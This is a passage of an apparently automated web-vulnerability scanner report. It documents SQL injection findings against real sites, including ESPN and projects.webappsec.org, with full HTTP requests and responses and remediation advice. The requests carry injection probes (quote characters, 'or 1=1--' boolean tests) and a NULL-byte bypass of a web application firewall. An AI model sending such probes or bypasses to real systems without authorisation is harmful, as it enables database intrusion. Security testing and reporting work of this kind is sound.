Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 20-Apr-2011 01:47:57 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 18-Jul-2011 01:47:57 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 18-Jul-2011 01:47:57 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG68%Cxrx)0s]#%2L_'x%SEV/hnJPh4FSlRQHqgV=Rr7(d+tn3IZ5dYk^WA1.#'$yWMx*vWM_?:!#nt[_R)y-; path=/; expires=Mon, 18-Jul-2011 01:47:57 GMT; domain=.adnxs.com; HttpOnly
Location: http://cm.g.doubleclick.net/pixel?nid=appnexus1
Date: Tue, 19 Apr 2011 01:47:57 GMT
Content-Length: 0

Request 2

GET /seg?add=25761&t=272427688%20or%201%3d2--%20 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII3I4BEAoYCSAJKAkwsvqt7QQQsvqt7QQYCA..; uuid2=2724386019227846218; anj=Kfu=8fG5EfCxrx)0s]#%2L_'x%SEV/hnKD-GW_55dWhK/!!svq

Response 2

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 20-Apr-2011 01:47:58 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 18-Jul-2011 01:47:58 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 18-Jul-2011 01:47:58 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG68%Cxrx)0s]#%2L_'x%SEV/hnJPh4FSlRQHqgVGli^UO9N+dx4#Y6gc_2t(RiF9Ts-oL7?25+; path=/; expires=Mon, 18-Jul-2011 01:47:58 GMT; domain=.adnxs.com; HttpOnly
Location: http://apnxscm.ac3.msn.com:81/CACMSH.ashx?&t=1
Date: Tue, 19 Apr 2011 01:47:58 GMT
Content-Length: 0
1.71. http://insider.espn.go.com/mlb/blog [name parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://insider.espn.go.com
Path:   /mlb/blog

Issue detail

The name parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mlb/blog?name=stark_jayson%00'&id=6154671 HTTP/1.1
Host: insider.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:11:36 GMT
Content-Type: text/html
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: EGW01
Set-Cookie: SWID=1403E81B-E844-450D-8016-A9D7C84C3D1C; path=/; expires=Sat, 26-Feb-2031 02:11:36 GMT; domain=.go.com;
Cache-Expires: Fri, 25 Feb 2011 23:30:15 GMT
Content-Length: 140777
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; expires=Tue, 08 Mar 2011 02:11:36 GMT; Path=/; Domain=.go.com
Connection: close
Via: 8810-05/06
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<i>In the history of baseball, with one bizarre additional exception I'll mention in a bit, only two pitchers with 10 or more winning seasons have never had a losing season: Spud Chandler, and Andy Pettitte.</p>
...[SNIP]...

Request 2

GET /mlb/blog?name=stark_jayson%00''&id=6154671 HTTP/1.1
Host: insider.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 302 Found
Date: Sat, 26 Feb 2011 02:11:38 GMT
Location: http://sports.espn.go.com/espn/blog/main
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: EGW05
Set-Cookie: SWID=EEFF394D-7A80-49A6-8F43-AA925F0275F6; path=/; expires=Sat, 26-Feb-2031 02:11:38 GMT; domain=.go.com;
Content-Length: 197
Connection: close
Via: 8810-05/06

<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="http://sports.espn.go.com/espn/blog/main
">http://sports.espn.go.com/espn/blog/main
</A>.<BODY></HTML>

1.72. http://projects.webappsec.org/SQL-Injection [Referer HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://projects.webappsec.org
Path:   /SQL-Injection

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /SQL-Injection HTTP/1.1
Host: projects.webappsec.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=133238479.1298670519.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pbj=c141224b73feb9193565e6eeb03e001298670485; pb_perfmon=deleted; __utma=133238479.1282775871.1298670519.1298670519.1298670519.1; __utmc=133238479; __qca=P0-1048600453-1298670520461; __utmb=133238479.1.10.1298670519;
Referer: http://www.google.com/search?hl=en&q='

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Sat, 26 Feb 2011 02:15:29 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Expires: Fri, 25 Feb 2011 02:15:29 GMT
Cache-Control: no-cache
Content-Length: 29015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
<meta http-equiv="cont
...[SNIP]...
<pre style="margin-left:40px;">Microsoft OLE DB Provider for ODBC Drivers error
</pre>
...[SNIP]...
<pre style="margin-left:40px;">[Microsoft][ODBC SQL Server Driver][SQL Server]All
</pre>
...[SNIP]...

1.73. http://projects.webappsec.org/SQL-Injection [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://projects.webappsec.org
Path:   /SQL-Injection

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the User-Agent HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /SQL-Injection HTTP/1.1
Host: projects.webappsec.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: __utmz=133238479.1298670519.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pbj=c141224b73feb9193565e6eeb03e001298670485; pb_perfmon=deleted; __utma=133238479.1282775871.1298670519.1298670519.1298670519.1; __utmc=133238479; __qca=P0-1048600453-1298670520461; __utmb=133238479.1.10.1298670519;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Sat, 26 Feb 2011 02:15:27 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Expires: Fri, 25 Feb 2011 02:15:27 GMT
Cache-Control: no-cache
Content-Length: 29016

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
<meta http-equiv="cont
...[SNIP]...
<pre style="margin-left:40px;">Microsoft OLE DB Provider for ODBC Drivers error
</pre>
...[SNIP]...
<pre style="margin-left:40px;">[Microsoft][ODBC SQL Server Driver][SQL Server]All
</pre>
...[SNIP]...

1.74. http://projects.webappsec.org/SQL-Injection [__qca cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://projects.webappsec.org
Path:   /SQL-Injection

Issue detail

The __qca cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the __qca cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /SQL-Injection HTTP/1.1
Host: projects.webappsec.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=133238479.1298670519.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pbj=c141224b73feb9193565e6eeb03e001298670485; pb_perfmon=deleted; __utma=133238479.1282775871.1298670519.1298670519.1298670519.1; __utmc=133238479; __qca=P0-1048600453-1298670520461'; __utmb=133238479.1.10.1298670519;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Sat, 26 Feb 2011 02:15:18 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Expires: Fri, 25 Feb 2011 02:15:18 GMT
Cache-Control: no-cache
Content-Length: 29016

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
<meta http-equiv="cont
...[SNIP]...
<pre style="margin-left:40px;">Microsoft OLE DB Provider for ODBC Drivers error
</pre>
...[SNIP]...
<pre style="margin-left:40px;">[Microsoft][ODBC SQL Server Driver][SQL Server]All
</pre>
...[SNIP]...

1.75. http://projects.webappsec.org/SQL-Injection [__utma cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://projects.webappsec.org
Path:   /SQL-Injection

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the __utma cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /SQL-Injection HTTP/1.1
Host: projects.webappsec.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=133238479.1298670519.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pbj=c141224b73feb9193565e6eeb03e001298670485; pb_perfmon=deleted; __utma=133238479.1282775871.1298670519.1298670519.1298670519.1'; __utmc=133238479; __qca=P0-1048600453-1298670520461; __utmb=133238479.1.10.1298670519;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Sat, 26 Feb 2011 02:15:13 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Expires: Fri, 25 Feb 2011 02:15:13 GMT
Cache-Control: no-cache
Content-Length: 29028

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
<meta http-equiv="cont
...[SNIP]...
<pre style="margin-left:40px;">Microsoft OLE DB Provider for ODBC Drivers error
</pre>
...[SNIP]...
<pre style="margin-left:40px;">[Microsoft][ODBC SQL Server Driver][SQL Server]All
</pre>
...[SNIP]...

1.76. http://projects.webappsec.org/SQL-Injection [__utmb cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://projects.webappsec.org
Path:   /SQL-Injection

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the __utmb cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /SQL-Injection HTTP/1.1
Host: projects.webappsec.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=133238479.1298670519.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pbj=c141224b73feb9193565e6eeb03e001298670485; pb_perfmon=deleted; __utma=133238479.1282775871.1298670519.1298670519.1298670519.1; __utmc=133238479; __qca=P0-1048600453-1298670520461; __utmb=133238479.1.10.1298670519';

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Sat, 26 Feb 2011 02:15:20 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Expires: Fri, 25 Feb 2011 02:15:20 GMT
Cache-Control: no-cache
Content-Length: 29016

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
<meta http-equiv="cont
...[SNIP]...
<pre style="margin-left:40px;">Microsoft OLE DB Provider for ODBC Drivers error
</pre>
...[SNIP]...
<pre style="margin-left:40px;">[Microsoft][ODBC SQL Server Driver][SQL Server]All
</pre>
...[SNIP]...

1.77. http://projects.webappsec.org/SQL-Injection [__utmc cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://projects.webappsec.org
Path:   /SQL-Injection

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the __utmc cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /SQL-Injection HTTP/1.1
Host: projects.webappsec.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=133238479.1298670519.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pbj=c141224b73feb9193565e6eeb03e001298670485; pb_perfmon=deleted; __utma=133238479.1282775871.1298670519.1298670519.1298670519.1; __utmc=133238479'; __qca=P0-1048600453-1298670520461; __utmb=133238479.1.10.1298670519;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Sat, 26 Feb 2011 02:15:16 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Expires: Fri, 25 Feb 2011 02:15:15 GMT
Cache-Control: no-cache
Content-Length: 29016

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
<meta http-equiv="cont
...[SNIP]...
<pre style="margin-left:40px;">Microsoft OLE DB Provider for ODBC Drivers error
</pre>
...[SNIP]...
<pre style="margin-left:40px;">[Microsoft][ODBC SQL Server Driver][SQL Server]All
</pre>
...[SNIP]...

1.78. http://projects.webappsec.org/SQL-Injection [__utmz cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://projects.webappsec.org
Path:   /SQL-Injection

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the __utmz cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /SQL-Injection HTTP/1.1
Host: projects.webappsec.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=133238479.1298670519.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)'; pbj=c141224b73feb9193565e6eeb03e001298670485; pb_perfmon=deleted; __utma=133238479.1282775871.1298670519.1298670519.1298670519.1; __utmc=133238479; __qca=P0-1048600453-1298670520461; __utmb=133238479.1.10.1298670519;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Sat, 26 Feb 2011 02:14:57 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Expires: Fri, 25 Feb 2011 02:14:57 GMT
Cache-Control: no-cache
Content-Length: 29027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
<meta http-equiv="cont
...[SNIP]...
<pre style="margin-left:40px;">Microsoft OLE DB Provider for ODBC Drivers error
</pre>
...[SNIP]...
<pre style="margin-left:40px;">[Microsoft][ODBC SQL Server Driver][SQL Server]All
</pre>
...[SNIP]...

1.79. http://projects.webappsec.org/SQL-Injection [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://projects.webappsec.org
Path:   /SQL-Injection

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /SQL-Injection?1'=1 HTTP/1.1
Host: projects.webappsec.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=133238479.1298670519.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pbj=c141224b73feb9193565e6eeb03e001298670485; pb_perfmon=deleted; __utma=133238479.1282775871.1298670519.1298670519.1298670519.1; __utmc=133238479; __qca=P0-1048600453-1298670520461; __utmb=133238479.1.10.1298670519;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Sat, 26 Feb 2011 02:15:24 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Expires: Fri, 25 Feb 2011 02:15:24 GMT
Cache-Control: no-cache
Content-Length: 29027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
<meta http-equiv="cont
...[SNIP]...
<pre style="margin-left:40px;">Microsoft OLE DB Provider for ODBC Drivers error
</pre>
...[SNIP]...
<pre style="margin-left:40px;">[Microsoft][ODBC SQL Server Driver][SQL Server]All
</pre>
...[SNIP]...

1.80. http://projects.webappsec.org/SQL-Injection [pb_perfmon cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://projects.webappsec.org
Path:   /SQL-Injection

Issue detail

The pb_perfmon cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the pb_perfmon cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /SQL-Injection HTTP/1.1
Host: projects.webappsec.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=133238479.1298670519.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pbj=c141224b73feb9193565e6eeb03e001298670485; pb_perfmon=deleted'; __utma=133238479.1282775871.1298670519.1298670519.1298670519.1; __utmc=133238479; __qca=P0-1048600453-1298670520461; __utmb=133238479.1.10.1298670519;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Sat, 26 Feb 2011 02:15:10 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Expires: Fri, 25 Feb 2011 02:15:10 GMT
Cache-Control: no-cache
Content-Length: 29028

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
<meta http-equiv="cont
...[SNIP]...
<pre style="margin-left:40px;">Microsoft OLE DB Provider for ODBC Drivers error
</pre>
...[SNIP]...
<pre style="margin-left:40px;">[Microsoft][ODBC SQL Server Driver][SQL Server]All
</pre>
...[SNIP]...

1.81. http://projects.webappsec.org/SQL-Injection [pbj cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://projects.webappsec.org
Path:   /SQL-Injection

Issue detail

The pbj cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the pbj cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /SQL-Injection HTTP/1.1
Host: projects.webappsec.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=133238479.1298670519.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pbj=c141224b73feb9193565e6eeb03e001298670485'; pb_perfmon=deleted; __utma=133238479.1282775871.1298670519.1298670519.1298670519.1; __utmc=133238479; __qca=P0-1048600453-1298670520461; __utmb=133238479.1.10.1298670519;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Sat, 26 Feb 2011 02:15:08 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Expires: Fri, 25 Feb 2011 02:15:08 GMT
Cache-Control: no-cache
Content-Length: 28610

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
<meta http-equiv="cont
...[SNIP]...
<pre style="margin-left:40px;">Microsoft OLE DB Provider for ODBC Drivers error
</pre>
...[SNIP]...
<pre style="margin-left:40px;">[Microsoft][ODBC SQL Server Driver][SQL Server]All
</pre>
...[SNIP]...

1.82. http://projects.webappsec.org/w/session/login [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://projects.webappsec.org
Path:   /w/session/login

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads 15929952'%20or%201%3d1--%20 and 15929952'%20or%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /w/session/login HTTP/1.1
Host: projects.webappsec.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=133238479.1298670519.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pbj=c141224b73feb9193565e6eeb03e001298670485; pb_perfmon=deleted; __utma=133238479.1282775871.1298670519.1298670519.1298670519.1; __utmc=133238479; __qca=P0-1048600453-1298670520461; __utmb=133238479.1.10.1298670519;
Referer: http://www.google.com/search?hl=en&q=15929952'%20or%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Sat, 26 Feb 2011 02:14:49 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Expires: Fri, 25 Feb 2011 02:14:49 GMT
Cache-Control: no-cache
Content-Length: 7079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
<meta http-equiv="cont
...[SNIP]...
<script type="text/javascript">
PBperf["ts_c_ft_rcv"] = new Date().getTime().toString()
PBperf["ts_s_req_st"] = "1298686489652";
PBperf["ts_s_rend_st"] = "1298686489687";
PBperf["wiki"] = "webappsec";
PBperf["sn"] = "16867";
PBperf["ts_s_rend_fin"] = "1298686489708";

</script>
</body>
</html>
<script>
if( Cookie.get('pbj') == '' && $('enable_cookies_msg') ){
$('enable_cookies_msg').show();
var fail;
if(fail = $('password_fail')) { fail.hide(); }
}</script>
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<script type="text/javascript">_qacct="p-16CGFkiSpdTEU";quantserve();</script>
<noscript><img src="http://pixel.quantserve.com/pixel/p-16CGFkiSpdTEU.gif" style="display: none" height="1" width="1" alt="Quantcast"/></noscript>
<!-- End Quantcast tag -->
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-2694787-12");
pageTracker._setDomainName(".pbworks.com");
if (document.cookie.match(/hm=/)) {
pageTracker._setVar('authenticated');
}
pageTracker._setAllowHash(false);
pageTracker._trackPageview();
</script>

<!-- v=2,utz=x,ssl=0,ua=Win-MSIE-7,uid=0,sn=16867,pid=7359,hn=sf52,php=5.3.3-7,nw=0,w=webappsec,pv=pub,pkg=p5,perm=none,crea=1236791014,mt=1298335040,sc=1554,cl=1,cat=edu,mpu=7,NQsid=1,Nmc=252,Ncd=0.0010,Nkb=26,Nct=0.0635,Ncl=1298680821.1519,Nwc=1,Nwt=1298680821.1731,sid=13246901,te=0.062 -->

Request 2

GET /w/session/login HTTP/1.1
Host: projects.webappsec.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=133238479.1298670519.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pbj=c141224b73feb9193565e6eeb03e001298670485; pb_perfmon=deleted; __utma=133238479.1282775871.1298670519.1298670519.1298670519.1; __utmc=133238479; __qca=P0-1048600453-1298670520461; __utmb=133238479.1.10.1298670519;
Referer: http://www.google.com/search?hl=en&q=15929952'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Sat, 26 Feb 2011 02:14:50 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Expires: Fri, 25 Feb 2011 02:14:50 GMT
Cache-Control: no-cache
Content-Length: 7067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
<meta http-equiv="cont
...[SNIP]...
<script type="text/javascript">
PBperf["ts_c_ft_rcv"] = new Date().getTime().toString()
PBperf["ts_s_req_st"] = "1298686490301";
PBperf["ts_s_rend_st"] = "1298686490397";
PBperf["wiki"] = "webappsec";
PBperf["sn"] = "16886";
PBperf["ts_s_rend_fin"] = "1298686490420";

</script>
</body>
</html>
<script>
if( Cookie.get('pbj') == '' && $('enable_cookies_msg') ){
$('enable_cookies_msg').show();
var fail;
if(fail = $('password_fail')) { fail.hide(); }
}</script>
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<script type="text/javascript">_qacct="p-16CGFkiSpdTEU";quantserve();</script>
<noscript><img src="http://pixel.quantserve.com/pixel/p-16CGFkiSpdTEU.gif" style="display: none" height="1" width="1" alt="Quantcast"/></noscript>
<!-- End Quantcast tag -->
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-2694787-12");
pageTracker._setDomainName(".pbworks.com");
